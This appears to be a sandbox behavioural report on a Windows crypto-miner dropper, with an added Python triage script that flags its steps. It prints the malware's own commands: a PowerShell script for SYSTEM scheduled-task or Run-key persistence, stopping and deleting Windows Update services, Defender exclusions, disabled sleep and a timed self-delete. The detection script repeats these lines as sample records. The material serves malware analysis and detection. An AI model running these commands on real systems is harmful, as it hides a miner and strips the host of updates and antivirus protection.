    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe qeiyvjdhkxdqJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
    Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcszdjva.jzu.ps1Jump to behavior
    Source: WR64.sys.32.drBinary string: \Device\WinRing0_1_2_0
    Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@105/19@2/0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935D62A0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,58_2_00007FF6935D62A0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1948:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3248:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\JiAlAaAa__shmem3_winpthreads_tdm_
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\qeiyvjdhkxdq
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5032:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1840:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3736:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:640:120:WilError_01
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeMutant created: \Sessions\1\BaseNamedObjects\KiBgAaAa__shmem3_winpthreads_tdm_
    Source: C:\Program Files\WindowsServices\WindowsAutHostMutant created: \BaseNamedObjects\MeAdAaAa__shmem3_winpthreads_tdm_
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1096:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\gnbfrobbqdiittna
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4132:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_01
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeFile created: C:\Program Files\WindowsServicesJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: 8iTXwpHCHb.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: 8iTXwpHCHb.exeStatic file information: File size 9861120 > 1048576
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeDirectory created: C:\Program Files\WindowsServicesJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostDirectory created: C:\Program Files\Google\LibsJump to behavior
    Source: C:\Windows\System32\cmd.exeDirectory created: C:\Program Files\Google\Libs\g.log
    Source: 8iTXwpHCHb.exeStatic PE information: Raw size of .u4~ is bigger than: 0x100000 < 0x966000
    Source: 8iTXwpHCHb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.dr
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8164C0ACD push eax; retf 7_2_00007FF8164C0DC1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8164C5F33 push edi; ret 7_2_00007FF8164C5F36
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .xdata
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .HJN
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .7Z\
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .u4~
    Source: WindowsAutHost.0.drStatic PE information: section name: .xdata
    Source: WindowsAutHost.0.drStatic PE information: section name: .HJN
    Source: WindowsAutHost.0.drStatic PE information: section name: .7Z\
    Source: WindowsAutHost.0.drStatic PE information: section name: .u4~
    Source: 34E5.tmp.32.drStatic PE information: section name: .xdata
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935E1170 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,58_2_00007FF6935E1170
    Source: initial sampleStatic PE information: section where entry point is pointing to: .u4~
    Source: WindowsAutHost.0.drStatic PE information: real checksum: 0x96d469 should be: 0x96d46a
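    The process-creation rows above are the whole installation chain, and the report shows the installed copy (WindowsAutHost) re-running the same steps the dropper ran: stop and unregister the Windows Update services, zero the sleep and hibernate timeouts, register a SYSTEM scheduled task (or fall back to an HKCU Run key), exclude the user profile and Program Files from Defender, enumerate the GPU, and delete the original file after a three-second `choice` delay. The following is an added example, not part of the Joe Sandbox report: a small behavioural triage pass that applies one rule per step to process-start records and only labels the host when several distinct steps co-occur. The record layout (parent, image, cmdline) and the rule names are assumptions of this example; the sample records are constructed, abridged from the command lines in the report, plus one benign control record.

```python
"""Behavioural triage of process-start records for the dropper chain above.

Added example, not part of the Joe Sandbox report. Record layout and rule
names are assumptions; the records are constructed from the report's rows.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Windows Update / delivery services the sample stops and unregisters.
UPDATE_SERVICES = ("usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc")
_SVC_ALT = "|".join(UPDATE_SERVICES)

# (rule name, pattern); every pattern is applied to the lowercased command line.
RULES = [
    ("stop_update_service",
     re.compile(rf"\bsc(\.exe)?\s+stop\s+({_SVC_ALT})\b")),
    ("delete_service_key",
     re.compile(rf'\breg(\.exe)?\s+delete\s+"?hklm\\system\\currentcontrolset\\services\\({_SVC_ALT})"?\s+/f')),
    ("disable_sleep",
     re.compile(r"\bpowercfg(\.exe)?\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b")),
    ("defender_exclusion",
     re.compile(r"add-mppreference\s+.*-exclusionpath")),
    ("scheduled_task_persistence",
     re.compile(r"register-scheduledtask|\bschtasks(\.exe)?\s+/create")),
    ("run_key_persistence",
     re.compile(r'\breg(\.exe)?\s+add\s+"hkcu\\software\\microsoft\\windows\\currentversion\\run"')),
    ("timed_self_delete",
     re.compile(r"\bchoice\s+/c\s+y\s+/n\s+/d\s+y\s+/t\s+\d+\s*&\s*del\b")),
    ("gpu_enumeration",
     re.compile(r"win32_videocontroller")),
]


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process (assumed field)
    image: str     # image path of the created process (assumed field)
    cmdline: str   # full command line as logged


def match_rules(cmdline):
    """Names of every rule whose pattern occurs in the command line."""
    lowered = cmdline.lower()
    return {name for name, rx in RULES if rx.search(lowered)}


def triage(events):
    """Count rule hits and record which parent image triggered which rules."""
    hits, per_parent = Counter(), {}
    for ev in events:
        names = match_rules(ev.cmdline)
        hits.update(names)
        if names:
            per_parent.setdefault(ev.parent.lower(), set()).update(names)
    return hits, per_parent


def verdict(hits, min_distinct=4):
    """Label only when enough distinct steps co-occur; one powercfg change or
    one service stop on its own is normal administration and too noisy."""
    distinct = len(hits)
    return ("miner-dropper chain" if distinct >= min_distinct else "inconclusive"), distinct


# Constructed records, abridged from the report's rows.
DROPPER = r"C:\Users\user\Desktop\8iTXwpHCHb.exe"
PAYLOAD = r"C:\Program Files\WindowsServices\WindowsAutHost"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SERVICE_KILL = (r'cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits '
                r'& sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f '
                r'& reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f')
PERSIST = (r"""powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal("""
           r"""[Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole("""
           r"""[Security.Principal.WindowsBuiltInRole]::Administrator)) { Register-ScheduledTask """
           r"""-Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') """
           r"""-Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'WindowsAutHost' -User 'System' """
           r"""-RunLevel 'Highest' -Force } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" """
           r"""/v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }""")
SAMPLE_EVENTS = [
    ProcEvent(DROPPER, CMD, SERVICE_KILL),
    ProcEvent(DROPPER, CMD, r"cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"),
    ProcEvent(DROPPER, PS, PERSIST),
    ProcEvent(DROPPER, CMD, r'cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe"'),
    ProcEvent(PAYLOAD, PS, r"powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    ProcEvent(PAYLOAD, CMD, SERVICE_KILL),
    ProcEvent(PAYLOAD, CMD, r'cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"'),
    # Benign control record (constructed): no rule should fire.
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    hits, per_parent = triage(SAMPLE_EVENTS)
    print(verdict(hits), dict(hits))
    for parent, names in sorted(per_parent.items()):
        print(parent, sorted(names))
```

    Keying the per-parent summary on the creating image is what makes the second stage visible: the same service-kill and Defender-exclusion rules fire once with the dropper as parent and again with the installed WindowsAutHost as parent, which is the re-execution the report's rows show. The distinct-rule threshold is the tuning knob; a single `powercfg` or `sc stop` row is routine administration, the combination is not.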

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Program Files\WindowsServices\WindowsAutHost | File created: C:\Program Files\Google\Libs\WR64.sys
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | File created: C:\Program Files\WindowsServices\WindowsAutHost
    Source: C:\Program Files\WindowsServices\WindowsAutHost | File created: C:\Windows\Temp\34E5.tmp
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | File created: C:\Program Files\WindowsServices\WindowsAutHost
    Source: C:\Program Files\WindowsServices\WindowsAutHost | File created: C:\Program Files\Google\Libs\WR64.sys
    Source: C:\Program Files\WindowsServices\WindowsAutHost | File created: C:\Windows\Temp\34E5.tmp

    Boot Survival

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Memory written: PID: 5800 base: 7FF89AD50008 value: E9 7B A9 EA FF
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Memory written: PID: 5800 base: 7FF89ABFA980 value: E9 90 56 15 00
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Memory written: PID: 964 base: 7FF89AD50008 value: E9 7B A9 EA FF
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Memory written: PID: 964 base: 7FF89ABFA980 value: E9 90 56 15 00
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Module Loaded: C:\WINDOWS\TEMP\34E5.TMP
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
